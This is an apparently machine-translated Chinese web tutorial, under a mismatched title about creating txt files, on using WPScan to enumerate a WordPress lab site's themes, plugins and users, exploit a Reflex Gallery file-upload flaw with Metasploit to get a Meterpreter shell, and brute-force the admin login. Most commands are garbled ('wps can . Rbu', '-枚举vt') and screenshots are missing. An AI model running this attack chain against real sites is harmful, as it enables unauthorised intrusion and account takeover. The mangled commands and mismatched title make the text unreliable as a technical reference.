无法新建txt怎么办,无法新建wps

  

  写在前面的话   

  

  在这篇文章中,我将告诉你如何使用WPScan来测试WordPress站点的安全性。   

  

  WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。   

  

  接下来,让我们进入正题…   

  

  工具安装与运行   

  

  Kali Linux默认自带WPScan。您也可以使用以下命令在您自己的设备中安装WPScan:   

  

  git克隆https://github.com/wpscanteam/wpscan.git   

  

  切换到WPScan目录,运行以下命令查看帮助信息:/wps can . Rbh   

  

  您还可以使用以下命令来更新漏洞数据库:   

  

  wps can-更新扫描WordPress站点   

  

  我们可以使用- enumerate选项来扫描和发现关于目标站点主题、插件和用户名的信息。输入以下命令开始扫描服务器:/wps can . Rbu http://192 . 168 . 0 . 101/WordPress/如果不知道目标服务器的IP地址,可以只输入URL地址。以下是扫描结果:   

  

     

  

  从结果中可以看到,服务器信息是Apache/2.4.6,PHP /5.5.9,WordPress v4.8.1我们还发现上传目录开启了目录监控功能,任何人都可以通过访问wp-content/uploads查看目录中上传的内容。   

  

  主题扫描   

  

  使用以下命令扫描主题:/wps ca . Rbu http://192 . 168 . 0 . 101/WordPress-enumerate t   

  

  使用以下命令扫描主题中的漏洞:/wps can . r b-u http://192 . 168 . 0 . 101/WordPress/-枚举vt   

  

  插件扫描   

  

  插件可以扩展WordPress站点的功能,但是很多插件存在安全漏洞,这也会给攻击者提供可乘之机。   

  

  我们可以用下面的命令扫描WordPress站点上安装的插件:/wps can . r b-u http://192 . 168 . 0 . 101/WordPress/-enumerate p   

  

  我们可以看到这个网站安装了Akismet v3.3.3,pixbay-images v2.14,wptouch v3.4.3等很多插件。   

  

     

  

  接下来,我们可以使用以下命令来扫描目标插件的安全漏洞:/wps can . r b-u http://192 . 168 . 0 . 101/WordPress/-枚举vp   

  

  我们可以从扫描结果中看到这三个插件中的漏洞和利用路径:   

  

     

  

  结合Metasploit利用插件中的漏洞   

  

  接下来,我们将通过使用第一个插件中的任何文件上传漏洞来演示利用漏洞,该漏洞允许我们上传恶意文件并实现远程代码执行。   

  

  打开终端窗口,输入以下命令:   

  

  use exploit/UNIX/web app/WP _ reflex gallery _ file _ uploadmsfexploit(WP _ reflex gallery _ file _ upload)Set rhost 192 . 168 . 0 . 101 MSF exploit(WP _ reflex gallery _ file _ upload)Set target uri/WordPress/MSF exploit(WP _ reflex gallery _ file _ upload)exploit您会看到终端已经与目标设备建立了Meterpreter会话,您可以输入以下命令来查看目标系统信息:   

  

  Sysinfo   

  

  枚举WordPress用户名   

  

  我们可以在终端输入以下命令来枚举WordPress用户名:/wps can . r b-u http://192 . 168 . 0 . 101/WordPress/-enumerate u   

  

  接下来,该工具将导出用户名数据表,您可以看到用户名和相应的ID信息。   

  

  当然,你也可以使用下面的命令来枚举所有的内容:/wps can . r b-u http://192 . 168 . 0 . 101/WordPress/-e at-e AP-e ue at :枚举目标网站的所有主题e AP :枚举目标网站的所有插件e u :枚举目标网站的所有用户名   

  

  使用WPScan进行暴力破解   

  

  在暴力攻击之前,我们需要创建相应的字典文件。输入以下命令:/wps can . Rbu http://192 . 168 . 0 . 101/WordPress/-word list/root/Desktop/dict . txt-username admin   

  

  如果找到匹配的用户名和密码,该工具将直接显示为admin:password:   

  

     

  

  严正声明:本文仅限于技术探讨,严禁用于其他目的。   

相关文章